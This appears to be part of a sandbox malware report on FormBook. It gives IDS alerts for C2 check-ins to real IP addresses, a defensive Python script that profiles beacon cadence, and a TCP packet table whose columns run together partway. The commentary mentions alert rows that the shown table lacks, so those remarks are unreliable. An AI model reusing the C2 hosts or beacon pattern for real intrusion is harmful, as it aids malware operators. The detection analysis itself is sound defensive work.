2024-11-06T08:42:38.520024+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50033 | 199.59.243.227 | 80 | TCP
2024-11-06T08:42:44.567492+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50034 | 188.114.97.3 | 80 | TCP
2024-11-06T08:42:47.149297+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50035 | 188.114.97.3 | 80 | TCP
2024-11-06T08:42:49.751293+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50036 | 188.114.97.3 | 80 | TCP
2024-11-06T08:42:52.287067+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50037 | 188.114.97.3 | 80 | TCP
2024-11-06T08:42:52.287067+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50037 | 188.114.97.3 | 80 | TCP
2024-11-06T08:42:58.661949+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50038 | 3.33.130.190 | 80 | TCP
2024-11-06T08:43:01.193658+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50039 | 3.33.130.190 | 80 | TCP
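The alert table above has a shape worth extracting rather than reading row by row: for each C2 host the sample sends three POST check-ins followed by one GET, each on a fresh source port and roughly 2.5 seconds apart, then moves to the next host (the two ET EXPLOIT hits on port 443 are unrelated to the check-ins). The GET also fires two rules at once (SIDs 2050745 and 2855465), so the same connection appears twice. The following Python is an added example, not part of the Joe Sandbox report and not FormBook's own code: it parses a subset of the rows above (copied here, tab-joined, for the first three hosts), collapses the duplicate GET alerts by connection, and reports the per-host method sequence and check-in cadence. The POST,POST,POST,GET matcher and the connection key used for de-duplication are this example's own assumptions.

```python
"""Extract the per-host C2 check-in cadence from Suricata alert rows.

Added example for the Joe Sandbox report; not the report's or the
malware's code.  The sample rows are copied from the report's IDS alert
table (first three C2 hosts) and re-joined with tabs.
"""
import re
import statistics
from collections import OrderedDict
from datetime import datetime

# Constructed sample input: timestamp, SID, signature, severity,
# src IP, src port, dst IP, dst port, protocol (tab-separated).
SAMPLE_ALERTS = """\
2024-11-06T08:39:43.494387+0100\t2050745\tET MALWARE FormBook CnC Checkin (GET) M5\t1\t192.168.2.6\t49911\t154.92.61.37\t80\tTCP
2024-11-06T08:39:43.494387+0100\t2855465\tETPRO MALWARE FormBook CnC Checkin (GET) M2\t1\t192.168.2.6\t49911\t154.92.61.37\t80\tTCP
2024-11-06T08:40:00.378127+0100\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.6\t49983\t3.33.130.190\t80\tTCP
2024-11-06T08:40:02.083678+0100\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.6\t49984\t3.33.130.190\t80\tTCP
2024-11-06T08:40:04.597512+0100\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.6\t49985\t3.33.130.190\t80\tTCP
2024-11-06T08:40:07.142021+0100\t2050745\tET MALWARE FormBook CnC Checkin (GET) M5\t1\t192.168.2.6\t49986\t3.33.130.190\t80\tTCP
2024-11-06T08:40:07.142021+0100\t2855465\tETPRO MALWARE FormBook CnC Checkin (GET) M2\t1\t192.168.2.6\t49986\t3.33.130.190\t80\tTCP
2024-11-06T08:40:13.021440+0100\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.6\t49987\t203.161.49.193\t80\tTCP
2024-11-06T08:40:15.547543+0100\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.6\t49988\t203.161.49.193\t80\tTCP
2024-11-06T08:40:18.109970+0100\t2855464\tETPRO MALWARE FormBook CnC Checkin (POST) M3\t1\t192.168.2.6\t49989\t203.161.49.193\t80\tTCP
2024-11-06T08:40:20.672098+0100\t2050745\tET MALWARE FormBook CnC Checkin (GET) M5\t1\t192.168.2.6\t49990\t203.161.49.193\t80\tTCP
2024-11-06T08:40:20.672098+0100\t2855465\tETPRO MALWARE FormBook CnC Checkin (GET) M2\t1\t192.168.2.6\t49990\t203.161.49.193\t80\tTCP
"""

# The ET signature names carry the HTTP method in parentheses.
METHOD_RE = re.compile(r"\((GET|POST)\)")

# Assumed cycle (from this report): three POSTs then a GET per host.
CYCLE = ["POST", "POST", "POST", "GET"]


def parse_alerts(text):
    """Parse tab-separated rows into dicts sorted by time.

    Several rules can fire on one connection (ET and ETPRO both match the
    GET), so alerts are collapsed to one per (time, src, sport, dst, dport).
    """
    seen = set()
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, sig, _sev, src, sport, dst, dport, _proto = line.split("\t")
        key = (ts, src, sport, dst, dport)
        if key in seen:
            continue
        seen.add(key)
        m = METHOD_RE.search(sig)
        alerts.append({
            "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
            "sid": int(sid),
            "method": m.group(1) if m else None,
            "src": src, "sport": int(sport),
            "dst": dst, "dport": int(dport),
        })
    alerts.sort(key=lambda a: a["time"])
    return alerts


def checkin_sequences(alerts):
    """Map each destination host (first-seen order) to its HTTP method sequence."""
    seqs = OrderedDict()
    for a in alerts:
        seqs.setdefault(a["dst"], []).append(a["method"])
    return seqs


def intra_host_gaps(alerts):
    """Seconds between consecutive check-ins to the same host."""
    by_host = OrderedDict()
    for a in alerts:
        by_host.setdefault(a["dst"], []).append(a["time"])
    return {h: [(t2 - t1).total_seconds() for t1, t2 in zip(ts, ts[1:])]
            for h, ts in by_host.items()}


def cycle_hosts(alerts):
    """Hosts whose most recent check-ins form the assumed POST,POST,POST,GET cycle."""
    return [h for h, seq in checkin_sequences(alerts).items() if seq[-4:] == CYCLE]


if __name__ == "__main__":
    parsed = parse_alerts(SAMPLE_ALERTS)
    gaps = intra_host_gaps(parsed)
    for host, seq in checkin_sequences(parsed).items():
        med = statistics.median(gaps[host]) if gaps[host] else float("nan")
        print(f"{host:16} {' '.join(seq):22} median gap {med:.2f}s")
    print("hosts completing the cycle:", cycle_hosts(parsed))
```

Feeding the full table through the same functions gives the host rotation order and confirms that every host except the first (154.92.61.37, where only the GET was alerted on) and the last (3.33.130.190, cut off at the end of the capture) completes the cycle; in a SOC the same grouping is what turns a burst of near-identical alerts into one beaconing finding with the host list attached.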
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 6, 2024 08:39:42.497097969 CET | 49911 | 80 | 192.168.2.6 | 154.92.61.37
Nov 6, 2024 08:39:42.502002954 CET | 80 | 49911 | 154.92.61.37 | 192.168.2.6
Nov 6, 2024 08:39:42.502095938 CET | 49911 | 80 | 192.168.2.6 | 154.92.61.37
Nov 6, 2024 08:39:42.510540962 CET | 49911 | 80 | 192.168.2.6 | 154.92.61.37
Nov 6, 2024 08:39:42.515414953 CET | 80 | 49911 | 154.92.61.37 | 192.168.2.6
Nov 6, 2024 08:39:43.444372892 CET | 80 | 49911 | 154.92.61.37 | 192.168.2.6
Nov 6, 2024 08:39:43.494386911 CET | 49911 | 80 | 192.168.2.6 | 154.92.61.37
Nov 6, 2024 08:39:43.623641968 CET | 80 | 49911 | 154.92.61.37 | 192.168.2.6
Nov 6, 2024 08:39:43.623802900 CET | 49911 | 80 | 192.168.2.6 | 154.92.61.37
Nov 6, 2024 08:39:43.625179052 CET | 49911 | 80 | 192.168.2.6 | 154.92.61.37
Nov 6, 2024 08:39:43.629956961 CET | 80 | 49911 | 154.92.61.37 | 192.168.2.6
Nov 6, 2024 08:39:58.774239063 CET | 49983 | 80 | 192.168.2.6 | 3.33.130.190
Nov 6, 2024 08:39:58.779206991 CET | 80 | 49983 | 3.33.130.190 | 192.168.2.6
Nov 6, 2024 08:39:58.779367924 CET | 49983 | 80 | 192.168.2.6 | 3.33.130.190
Nov 6, 2024 08:39:58.887490034 CET | 49983 | 80 | 192.168.2.6 | 3.33.130.190
Nov 6, 2024 08:39:58.892349958 CET | 80 | 49983 | 3.33.130.190 | 192.168.2.6
Nov 6, 2024 08:40:00.378061056 CET | 80 | 49983 | 3.33.130.190 | 192.168.2.6
Nov 6, 2024 08:40:00.378127098 CET | 49983 | 80 | 192.168.2.6 | 3.33.130.190
Nov 6, 2024 08:40:00.400737047 CET | 49983 | 80 | 192.168.2.6 | 3.33.130.190
Nov 6, 2024 08:40:00.405683041 CET | 80 | 49983 | 3.33.130.190 | 192.168.2.6
Nov 6, 2024 08:40:01.421528101 CET | 49984 | 80 | 192.168.2.6 | 3.33.130.190
Nov 6, 2024 08:40:01.426395893 CET | 80 | 49984 | 3.33.130.190 | 192.168.2.6
Nov 6, 2024 08:40:01.426486969 CET | 49984 | 80 | 192.168.2.6 | 3.33.130.190
Nov 6, 2024 08:40:01.441909075 CET | 49984 | 80 | 192.168.2.6 | 3.33.130.190
Nov 6, 2024 08:40:01.446775913 CET | 80 | 49984 | 3.33.130.190 | 192.168.2.6
Nov 6, 2024 08:40:02.083580017 CET | 80 | 49984 | 3.33.130.190 | 192.168.2.6
Nov 6, 2024 08:40:02.083678007 CET | 49984 | 80 | 192.168.2.6 | 3.33.130.190
Nov 6, 2024 08:40:02.947467089 CET | 49984 | 80 | 192.168.2.6 | 3.33.130.190
Nov 6, 2024 08:40:02.952258110 CET | 80 | 49984 | 3.33.130.190 | 192.168.2.6
Nov 6, 2024 08:40:03.966655016 CET | 49985 | 80 | 192.168.2.6 | 3.33.130.190
Nov 6, 2024 08:40:03.971580982 CET | 80 | 49985 | 3.33.130.190 | 192.168.2.6
Nov 6, 2024 08:40:03.971709013 CET | 49985 | 80 | 192.168.2.6 | 3.33.130.190
Nov 6, 2024 08:40:03.983037949 CET | 49985 | 80 | 192.168.2.6 | 3.33.130.190
Nov 6, 2024 08:40:03.987971067 CET | 80 | 49985 | 3.33.130.190 | 192.168.2.6
Nov 6, 2024 08:40:03.988174915 CET | 80 | 49985 | 3.33.130.190 | 192.168.2.6
Nov 6, 2024 08:40:04.597369909 CET | 80 | 49985 | 3.33.130.190 | 192.168.2.6
Nov 6, 2024 08:40:04.597512007 CET | 49985 | 80 | 192.168.2.6 | 3.33.130.190
Nov 6, 2024 08:40:05.494396925 CET | 49985 | 80 | 192.168.2.6 | 3.33.130.190
Nov 6, 2024 08:40:05.499288082 CET | 80 | 49985 | 3.33.130.190 | 192.168.2.6
Nov 6, 2024 08:40:06.513761044 CET | 49986 | 80 | 192.168.2.6 | 3.33.130.190
Nov 6, 2024 08:40:06.523243904 CET | 80 | 49986 | 3.33.130.190 | 192.168.2.6
Nov 6, 2024 08:40:06.523354053 CET | 49986 | 80 | 192.168.2.6 | 3.33.130.190
Nov 6, 2024 08:40:06.531075954 CET | 49986 | 80 | 192.168.2.6 | 3.33.130.190
Nov 6, 2024 08:40:06.537527084 CET | 80 | 49986 | 3.33.130.190 | 192.168.2.6
Nov 6, 2024 08:40:07.141361952 CET | 80 | 49986 | 3.33.130.190 | 192.168.2.6
Nov 6, 2024 08:40:07.141936064 CET | 80 | 49986 | 3.33.130.190 | 192.168.2.6
Nov 6, 2024 08:40:07.142020941 CET | 49986 | 80 | 192.168.2.6 | 3.33.130.190
Nov 6, 2024 08:40:07.144632101 CET | 49986 | 80 | 192.168.2.6 | 3.33.130.190
Nov 6, 2024 08:40:07.150162935 CET | 80 | 49986 | 3.33.130.190 | 192.168.2.6
Nov 6, 2024 08:40:12.284398079 CET | 49987 | 80 | 192.168.2.6 | 203.161.49.193
Nov 6, 2024 08:40:12.289203882 CET | 80 | 49987 | 203.161.49.193 | 192.168.2.6
Nov 6, 2024 08:40:12.289280891 CET | 49987 | 80 | 192.168.2.6 | 203.161.49.193
Nov 6, 2024 08:40:12.301387072 CET | 49987 | 80 | 192.168.2.6 | 203.161.49.193
Nov 6, 2024 08:40:12.306303024 CET | 80 | 49987 | 203.161.49.193 | 192.168.2.6
Nov 6, 2024 08:40:12.982852936 CET | 80 | 49987 | 203.161.49.193 | 192.168.2.6
Nov 6, 2024 08:40:13.021349907 CET | 80 | 49987 | 203.161.49.193 | 192.168.2.6
Nov 6, 2024 08:40:13.021440029 CET | 49987 | 80 | 192.168.2.6 | 203.161.49.193
Nov 6, 2024 08:40:13.807001114 CET | 49987 | 80 | 192.168.2.6 | 203.161.49.193
Nov 6, 2024 08:40:14.826188087 CET | 49988 | 80 | 192.168.2.6 | 203.161.49.193
Nov 6, 2024 08:40:14.831085920 CET | 80 | 49988 | 203.161.49.193 | 192.168.2.6
Nov 6, 2024 08:40:14.831196070 CET | 49988 | 80 | 192.168.2.6 | 203.161.49.193
Nov 6, 2024 08:40:14.842593908 CET | 49988 | 80 | 192.168.2.6 | 203.161.49.193
Nov 6, 2024 08:40:14.847497940 CET | 80 | 49988 | 203.161.49.193 | 192.168.2.6
Nov 6, 2024 08:40:15.511419058 CET | 80 | 49988 | 203.161.49.193 | 192.168.2.6
Nov 6, 2024 08:40:15.547431946 CET | 80 | 49988 | 203.161.49.193 | 192.168.2.6
Nov 6, 2024 08:40:15.547543049 CET | 49988 | 80 | 192.168.2.6 | 203.161.49.193
Nov 6, 2024 08:40:16.353882074 CET | 49988 | 80 | 192.168.2.6 | 203.161.49.193
Nov 6, 2024 08:40:17.372709990 CET | 49989 | 80 | 192.168.2.6 | 203.161.49.193
Nov 6, 2024 08:40:17.377845049 CET | 80 | 49989 | 203.161.49.193 | 192.168.2.6
Nov 6, 2024 08:40:17.377940893 CET | 49989 | 80 | 192.168.2.6 | 203.161.49.193
Nov 6, 2024 08:40:17.389429092 CET | 49989 | 80 | 192.168.2.6 | 203.161.49.193
Nov 6, 2024 08:40:17.394979000 CET | 80 | 49989 | 203.161.49.193 | 192.168.2.6
Nov 6, 2024 08:40:17.396624088 CET | 80 | 49989 | 203.161.49.193 | 192.168.2.6
Nov 6, 2024 08:40:18.071787119 CET | 80 | 49989 | 203.161.49.193 | 192.168.2.6
Nov 6, 2024 08:40:18.109906912 CET | 80 | 49989 | 203.161.49.193 | 192.168.2.6
Nov 6, 2024 08:40:18.109970093 CET | 49989 | 80 | 192.168.2.6 | 203.161.49.193
Nov 6, 2024 08:40:18.900597095 CET | 49989 | 80 | 192.168.2.6 | 203.161.49.193
Nov 6, 2024 08:40:19.919563055 CET | 49990 | 80 | 192.168.2.6 | 203.161.49.193
Nov 6, 2024 08:40:19.924761057 CET | 80 | 49990 | 203.161.49.193 | 192.168.2.6
Nov 6, 2024 08:40:19.924848080 CET | 49990 | 80 | 192.168.2.6 | 203.161.49.193
Nov 6, 2024 08:40:19.932594061 CET | 49990 | 80 | 192.168.2.6 | 203.161.49.193
Nov 6, 2024 08:40:19.937530994 CET | 80 | 49990 | 203.161.49.193 | 192.168.2.6
Nov 6, 2024 08:40:20.633265972 CET | 80 | 49990 | 203.161.49.193 | 192.168.2.6
                                                                                                        Nov 6, 2024 08:40:20.671899080 CET8049990203.161.49.193192.168.2.6
                                                                                                        Nov 6, 2024 08:40:20.672097921 CET4999080192.168.2.6203.161.49.193
                                                                                                        Nov 6, 2024 08:40:20.673038006 CET4999080192.168.2.6203.161.49.193
                                                                                                        Nov 6, 2024 08:40:20.679121971 CET8049990203.161.49.193192.168.2.6
                                                                                                        Nov 6, 2024 08:40:25.734044075 CET4999180192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:25.742497921 CET80499913.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:25.742624998 CET4999180192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:25.759612083 CET4999180192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:25.764493942 CET80499913.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:26.374594927 CET80499913.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:26.374694109 CET4999180192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:27.275600910 CET4999180192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:27.280603886 CET80499913.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:28.294519901 CET4999380192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:28.299420118 CET80499933.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:28.299624920 CET4999380192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:28.310998917 CET4999380192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:28.315748930 CET80499933.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:28.933896065 CET80499933.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:28.933962107 CET4999380192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:29.824251890 CET4999380192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:29.885453939 CET80499933.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:30.841337919 CET4999480192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:31.148392916 CET80499943.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:31.148514032 CET4999480192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:31.159502029 CET4999480192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:31.164509058 CET80499943.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:31.164587975 CET80499943.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:31.782716990 CET80499943.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:31.782788992 CET4999480192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:32.718523979 CET4999480192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:32.723457098 CET80499943.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:33.731908083 CET4999580192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:33.736902952 CET80499953.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:33.737010002 CET4999580192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:33.744096994 CET4999580192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:33.748997927 CET80499953.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:34.354901075 CET80499953.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:34.357446909 CET80499953.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:34.357564926 CET4999580192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:34.358556032 CET4999580192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:34.363363028 CET80499953.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:39.397655964 CET4999680192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:39.404107094 CET80499963.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:39.404243946 CET4999680192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:39.417275906 CET4999680192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:39.422535896 CET80499963.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:40.033236980 CET80499963.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:40.033394098 CET4999680192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:40.935269117 CET4999680192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:40.940124035 CET80499963.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:41.962002039 CET4999780192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:41.967083931 CET80499973.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:41.967164993 CET4999780192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:41.980679035 CET4999780192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:41.985572100 CET80499973.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:42.594698906 CET80499973.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:42.594794035 CET4999780192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:43.494308949 CET4999780192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:43.499443054 CET80499973.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:44.533160925 CET4999880192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:44.538155079 CET80499983.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:44.538235903 CET4999880192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:44.573451996 CET4999880192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:44.578409910 CET80499983.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:44.578421116 CET80499983.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:45.156754971 CET80499983.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:45.156853914 CET4999880192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:46.088103056 CET4999880192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:46.093050003 CET80499983.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:47.238002062 CET4999980192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:47.243207932 CET80499993.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:47.243325949 CET4999980192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:47.255166054 CET4999980192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:47.260216951 CET80499993.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:47.886740923 CET80499993.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:47.887249947 CET80499993.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:47.887322903 CET4999980192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:47.890433073 CET4999980192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:47.895275116 CET80499993.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:52.971354961 CET5000080192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:52.976399899 CET8050000198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:40:52.983352900 CET5000080192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:53.007347107 CET5000080192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:53.012202978 CET8050000198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:40:53.640574932 CET8050000198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:40:53.673217058 CET8050000198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:40:53.673383951 CET5000080192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:54.510349989 CET5000080192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:55.594279051 CET5000180192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:55.599209070 CET8050001198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:40:55.601421118 CET5000180192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:55.615777969 CET5000180192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:55.620646000 CET8050001198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:40:56.266798019 CET8050001198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:40:56.299587011 CET8050001198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:40:56.299645901 CET5000180192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:57.137268066 CET5000180192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:58.161780119 CET5000280192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:58.166702032 CET8050002198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:40:58.166779041 CET5000280192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:58.184679985 CET5000280192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:58.189707994 CET8050002198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:40:58.189722061 CET8050002198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:40:59.697416067 CET5000280192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:59.742846966 CET8050002198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:41:00.717453003 CET5000380192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:41:00.723603010 CET8050003198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:41:00.723671913 CET5000380192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:41:00.734349966 CET5000380192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:41:00.739175081 CET8050003198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:41:01.380016088 CET8050003198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:41:01.412297010 CET8050003198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:41:01.413455009 CET5000380192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:41:01.416404009 CET5000380192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:41:01.421344042 CET8050003198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:41:06.642143011 CET8050002198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:41:06.642206907 CET5000280192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:41:06.745850086 CET5000580192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:06.750718117 CET8050005103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:06.750792980 CET5000580192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:06.764895916 CET5000580192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:06.769711018 CET8050005103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:07.425868988 CET8050005103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:07.456358910 CET8050005103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:07.459322929 CET5000580192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:08.276012897 CET5000580192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:09.295331955 CET5000680192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:09.300219059 CET8050006103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:09.303358078 CET5000680192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:09.315457106 CET5000680192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:09.320338011 CET8050006103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:09.973614931 CET8050006103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:10.004441023 CET8050006103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:10.004530907 CET5000680192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:10.823252916 CET5000680192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:11.844347954 CET5000780192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:11.849343061 CET8050007103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:11.849416018 CET5000780192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:11.865485907 CET5000780192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:11.870287895 CET8050007103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:11.870364904 CET8050007103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:12.519090891 CET8050007103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:12.549897909 CET8050007103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:12.550081015 CET5000780192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:13.371264935 CET5000780192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:14.389755011 CET5000880192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:14.394633055 CET8050008103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:14.394716024 CET5000880192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:14.405353069 CET5000880192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:14.410123110 CET8050008103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:15.086507082 CET8050008103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:15.086530924 CET8050008103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:15.086786985 CET5000880192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:15.117961884 CET8050008103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:15.118123055 CET5000880192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:15.121293068 CET5000880192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:15.126024961 CET8050008103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:20.760473967 CET5000980192.168.2.6154.23.184.218
